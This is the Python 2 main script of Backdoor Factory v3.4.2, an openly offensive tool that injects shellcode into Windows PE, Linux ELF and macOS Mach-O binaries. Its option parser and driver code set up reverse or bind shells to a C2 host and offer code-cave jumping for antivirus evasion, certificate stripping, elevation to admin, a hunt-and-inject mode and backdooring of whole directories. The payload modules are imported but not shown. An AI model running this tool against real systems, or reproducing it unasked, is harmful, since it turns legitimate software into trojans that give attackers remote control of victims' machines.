#!/usr/bin/env python2 ''' BackdoorFactory (BDF) v3 - FOUNTAINPATCH Many thanks to Ryan O'Neill --ryan 'at' codeslum org-- Without him, I would still be trying to do stupid things with the elf format. Also thanks to Silvio Cesare with his 1998 paper (http://vxheaven.org/lib/vsc01.html) which these ELF patching techniques are based on. Special thanks to Travis Morrow for poking holes in my ideas. Copyright (c) 2013-2017, Joshua Pitts All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' import sys import os import signal import time from random import choice from optparse import OptionParser from pebin import pebin from elfbin import elfbin from machobin import machobin def signal_handler(signal, frame): print '\nProgram Exit' sys.exit(0) class bdfMain(): version = """\ Version: 3.4.2 """ author = """\ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ALERT: NEW VERSION Available *** ONLY AVAILABLE TO SPONSORS *** SPONSOR HERE: https://github.com/sponsors/secretsquirrel Author: Joshua Pitts Email: the.midnite.runr[-at ]gmailcom Twitter: @ausernamedjosh !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! """ #ASCII ART menu = ["-.(`-') (`-') _ <-" ".(`-') _(`-') (`-')\n" "__( OO) (OO ).-/ _ __( OO)" "( (OO ).-> .-> .-> <-.(OO ) \n" "'-'---.\ / ,---. \-,-----.'-'. ,--" ".\ .'_ (`-')----. (`-')----. ,------,) \n" "| .-. (/ | \ /`.\ | .--./| .' /" "'`'-..__)( OO).-. '( OO).-. '| /`. ' \n" "| '-' `.) '-'|_.' | /_) (`-')| /)" "| | ' |( _) | | |( _) | | || |_.' | \n" "| /`'. |(| .-. | || |OO )| . ' |" " | / : \| |)| | \| |)| || . .' \n" "| '--' / | | | |(_' '--'\| |\ \|" " '-' / ' '-' ' ' '-' '| |\ \ \n" "`------' `--' `--' `-----'`--' '--'" "`------' `-----' `-----' `--' '--' \n" " (`-') _ (`-') " " (`-') \n" " <-. (OO ).-/ _ ( OO).-> " " .-> <-.(OO ) .-> \n" "(`-')-----./ ,---. \-,-----./ '._" " (`-')----. ,------,) ,--.' ,-. \n" "(OO|(_\---'| \ /`.\ | .--./|'--...__)" "( OO).-. '| /`. '(`-')'.' / \n" " / | '--. '-'|_.' | /_) (`-')`--. .--'" "( _) | | || |_.' |(OO \ / \n" " \_) .--'(| .-. | || |OO ) | | " " \| |)| || . .' | / /) \n" " `| |_) | | | |(_' '--'\ | | " " ' '-' '| |\ \ `-/ /` \n" " `--' `--' `--' `-----' `--' " " `-----' `--' '--' `--' \n", "__________ " " __ .___ \n" "\______ \_____ ____ " "| | __ __| _/____ ___________ \n" " | | _/\__ \ _/ ___\|" " |/ // __ |/ _ \ / _ \_ __ \ \n" " | | \ / __ \\\\ \__" "_| | <_> ) | \/\n" " |______ /(____ /\___ >" "__|_ \____ |\____/ \____/|__| \n" " \/ \/ \/" " \/ \/ \n" "___________ " "__ \n" "\_ _____/____ _____/" " |_ ___________ ___.__. \n" " | __) \__ \ _/ ___\ " " __\/ _ \_ __ < | | \n" " | \ / __ \\\\ \__" "_| | ( <_> ) | \/\___ | \n" " \___ / (____ /\___ >_" "_| \____/|__| / ____| \n" " \/ \/ \/ " " \/ \n", " ____ ____ ______ " " __ \n" " / __ )/ __ \/ ____/___ " "______/ /_____ _______ __\n" " / __ / / / / /_ / __ `/" " ___/ __/ __ \/ ___/ / / /\n" " / /_/ / /_/ / __/ / /_/ /" " /__/ /_/ /_/ / / / /_/ /\n" "/_____/_____/_/ \__,_/" "\___/\__/\____/_/ \__, /\n" " " " /____/\n"] signal.signal(signal.SIGINT, signal_handler) parser = OptionParser() parser.add_option("-f", "--file", dest="FILE", action="store", type="string", help="File to backdoor") parser.add_option("-s", "--shell", default="show", dest="SHELL", action="store", type="string", help="Payloads that are available for use." " Use 'show' to see payloads." ) parser.add_option("-H", "--hostip", default=None, dest="HOST", action="store", type="string", help="IP of the C2 for reverse connections.") parser.add_option("-P", "--port", default=None, dest="PORT", action="store", type="int", help="The port to either connect back to for reverse " "shells or to listen on for bind shells") parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING", default=False, action="store_true", help="Select this options if you want to use code cave" " jumping to further hide your shellcode in the binary." ) parser.add_option("-a", "--add_new_section", default=False, dest="ADD_SECTION", action="store_true", help="Mandating that a new section be added to the " "exe (better success) but less av avoidance") parser.add_option("-U", "--user_shellcode", default=None, dest="SUPPLIED_SHELLCODE", action="store", help="User supplied shellcode, make sure that it matches" " the architecture that you are targeting." ) parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES", action="store_true", help="The cave flag will find code caves that " "can be used for stashing shellcode. " "This will print to all the code caves " "of a specific size." "The -l flag can be use with this setting.") parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN", action="store", type="int", help="For use with -c to help find code " "caves of different sizes") parser.add_option("-o", "--output-file", default=None, dest="OUTPUT", action="store", type="string", help="The backdoor output file") parser.add_option("-n", "--section", default="sdata", dest="NSECTION", action="store", type="string", help="New section name must be " "less than seven characters") parser.add_option("-d", "--directory", dest="DIR", action="store", type="string", help="This is the location of the files that " "you want to backdoor. " "You can make a directory of file backdooring faster by " "forcing the attaching of a codecave " "to the exe by using the -a setting.") parser.add_option("-w", "--change_access", default=True, dest="CHANGE_ACCESS", action="store_false", help="This flag changes the section that houses " "the codecave to RWE. Sometimes this is necessary. " "Enabled by default. If disabled, the " "backdoor may fail.") parser.add_option("-i", "--injector", default=False, dest="INJECTOR", action="store_true", help="This command turns the backdoor factory in a " "hunt and shellcode inject type of mechanism. Edit " "the target settings in the injector module.") parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX", action="store", type="string", help="For use with injector, places a suffix" " on the original file for easy recovery") parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL", default=False, action="store_true", help="For use with injector module. This command" " deletes the original file. Not for use in production " "systems. *Author not responsible for stupid uses.*") parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0, type="int", action="store", help="Starting point on disk offset, in bytes. " "Some authors want to obfuscate their on disk offset " "to avoid reverse engineering, if you find one of those " "files use this flag, after you find the offset.") parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK", default=False, action="store_true", help="To determine if the file is supported by BDF prior" " to backdooring the file. For use by itself or with " "verbose. This check happens automatically if the " "backdooring is attempted." ) parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true", help="Future use, to help determine smallest shellcode possible in a PE file" ) parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true", help="Kills the banner." ) parser.add_option("-v", "--verbose", default=False, dest="VERBOSE", action="store_true", help="For debug information output.") parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL", type='string', action="store", help="ALL, x86, or x64 type binaries only. Default=ALL") parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false", help="Allows for the overwriting of the pointer to the PE certificate table" " effectively removing the certificate from the binary for all intents" " and purposes." ) parser.add_option("-R", "--runas_admin", dest="RUNAS_ADMIN", default=False, action="store_true", help="EXPERIMENTAL " "Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'" ". If this string is included in the binary, it must run as system/admin. If not " "in Support Check mode it will attmept to patch highestAvailable into the manifest " "if requestedExecutionLevel entry exists." ) parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false", help="Use this setting if you DON'T want to patch DLLs. Patches by default." ) parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store", help="For MACH-O format. If fat file, focus on which arch to patch. Default " "is x64. To force x86 use -F x86, to force both archs use -F ALL." ) parser.add_option("-B", "--beacon", dest="BEACON", default=15, action="store", type="int", help="For payloads that have the ability to beacon out, set the time in secs" ) parser.add_option("-m", "--patch-method", dest="PATCH_METHOD", default="manual", action="store", type="string", help="Patching methods for PE files, 'manual','automatic', replace " "and onionduke") parser.add_option("-b", "--user_malware", dest="SUPPLIED_BINARY", default=None, action="store", help="For onionduke. Provide your desired binary.") parser.add_option("-X", "--xp_mode", dest="XP_MODE", default=False, action="store_true", help="Default: DO NOT support for XP legacy machines, use -X to support XP" ". By default the binary will crash on XP machines (e.g. sandboxes)") parser.add_option("-A", "--idt_in_cave", dest="IDT_IN_CAVE", default=False, action="store_true", help="EXPERIMENTAL " "By default a new Import Directory Table is created in a new section, " "by calling this flag it will be put in a code cave. This can cause bianry " "failure is some cases. Test on target binaries first." ) parser.add_option("-C","--code_sign", dest="CODE_SIGN", default=False, action="store_true", help="For those with codesigning certs wishing to sign PE binaries only. " "Name your signing key and private key signingcert.cer and signingPrivateKey.pem " "repectively in the certs directory it's up to you to obtain signing certs.") parser.add_option("-p","--preprocess", dest="PREPROCESS", default=False, action="store_true", help="To execute preprocessing scripts in the preprocess directory") (options, args) = parser.parse_args() def basicDiscovery(FILE): macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe', '\xce\xfa\xed\xfe', ] testBinary = open(FILE, 'rb') header = testBinary.read(4) testBinary.close() if 'MZ' in header: return 'PE' elif 'ELF' in header: return 'ELF' elif header in macho_supported: return "MACHO" else: 'Only support ELF, PE, and MACH-O file formats' return None if options.NO_BANNER is False: print choice(menu) print author print version time.sleep(.5) else: print "\t Backdoor Factory" print author print version if options.DIR: for root, subFolders, files in os.walk(options.DIR): for _file in files: options.FILE = os.path.join(root, _file) if os.path.isdir(options.FILE) is True: print "Directory found, continuing" continue is_supported = basicDiscovery(options.FILE) if is_supported is "PE": supported_file = pebin(options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.CAVE_MINER, options.IMAGE_TYPE, options.ZERO_CERT, options.RUNAS_ADMIN, options.PATCH_DLL, options.PATCH_METHOD, options.SUPPLIED_BINARY, options.XP_MODE, options.IDT_IN_CAVE, options.CODE_SIGN, options.PREPROCESS, ) elif is_supported is "ELF": supported_file = elfbin(options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.FIND_CAVES, options.SHELL_LEN, options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE, options.PREPROCESS, ) elif is_supported is "MACHO": supported_file = machobin(options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.SUPPLIED_SHELLCODE, options.FAT_PRIORITY, options.BEACON, options.PREPROCESS, ) if options.SUPPORT_CHECK is True: if os.path.isfile(options.FILE): is_supported = False print "file", options.FILE try: is_supported = supported_file.support_check() except Exception, e: is_supported = False print 'Exception:', str(e), '%s' % options.FILE if is_supported is False or is_supported is None: print "%s is not supported." % options.FILE #continue else: print "%s is supported." % options.FILE # if supported_file.flItms['runas_admin'] is True: # print "%s must be run as admin." % options.FILE print "*" * 50 if options.SUPPORT_CHECK is True: sys.exit() print ("You are going to backdoor the following " "items in the %s directory:" % options.DIR) dirlisting = os.listdir(options.DIR) for item in dirlisting: print " {0}".format(item) answer = raw_input("Do you want to continue? (yes/no) ") if 'yes' in answer.lower(): for item in dirlisting: #print item print "*" * 50 options.File = options.DIR + '/' + item if os.path.isdir(options.FILE) is True: print "Directory found, continuing" continue print ("backdooring file %s" % item) result = None is_supported = basicDiscovery(options.FILE) try: if is_supported is "PE": supported_file = pebin(options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.CAVE_MINER, options.IMAGE_TYPE, options.ZERO_CERT, options.RUNAS_ADMIN, options.PATCH_DLL, options.PATCH_METHOD, options.SUPPLIED_BINARY, options.XP_MODE, options.IDT_IN_CAVE, options.CODE_SIGN, options.PREPROCESS, ) supported_file.OUTPUT = None supported_file.output_options() result = supported_file.patch_pe() elif is_supported is "ELF": supported_file = elfbin(options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.FIND_CAVES, options.SHELL_LEN, options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE, options.PREPROCESS, ) supported_file.OUTPUT = None supported_file.output_options() result = supported_file.patch_elf() elif is_supported is "MACHO": supported_file = machobin(options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.SUPPLIED_SHELLCODE, options.FAT_PRIORITY, options.BEACON, options.PREPROCESS, ) supported_file.OUTPUT = None supported_file.output_options() result = supported_file.patch_macho() if result is None: print 'Not Supported. Continuing' continue else: print ("[*] File {0} is in backdoored " "directory".format(supported_file.FILE)) except Exception as e: print "DIR ERROR", str(e) else: print("Goodbye") sys.exit() if options.INJECTOR is True: supported_file = pebin(options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.CAVE_MINER, options.DELETE_ORIGINAL, options.IMAGE_TYPE, options.ZERO_CERT, options.RUNAS_ADMIN, options.PATCH_DLL, options.PATCH_METHOD, options.SUPPLIED_BINARY, options.XP_MODE, options.IDT_IN_CAVE, options.CODE_SIGN, options.PREPROCESS, ) supported_file.injector() sys.exit() if not options.FILE: parser.print_help() sys.exit() #OUTPUT = output_options(options.FILE, options.OUTPUT) is_supported = basicDiscovery(options.FILE) if is_supported is "PE": supported_file = pebin(options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.CAVE_MINER, options.IMAGE_TYPE, options.ZERO_CERT, options.RUNAS_ADMIN, options.PATCH_DLL, options.PATCH_METHOD, options.SUPPLIED_BINARY, options.XP_MODE, options.IDT_IN_CAVE, options.CODE_SIGN, options.PREPROCESS, ) elif is_supported is "ELF": supported_file = elfbin(options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.FIND_CAVES, options.SHELL_LEN, options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE, options.PREPROCESS, ) elif is_supported is "MACHO": supported_file = machobin(options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.SUPPLIED_SHELLCODE, options.FAT_PRIORITY, options.BEACON, options.PREPROCESS, ) else: print "Not supported." sys.exit() result = supported_file.run_this() if result is True and options.SUPPORT_CHECK is False and supported_file.OUTPUT is not None: print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT)) #END BDF MAIN if __name__ == "__main__": bdfMain()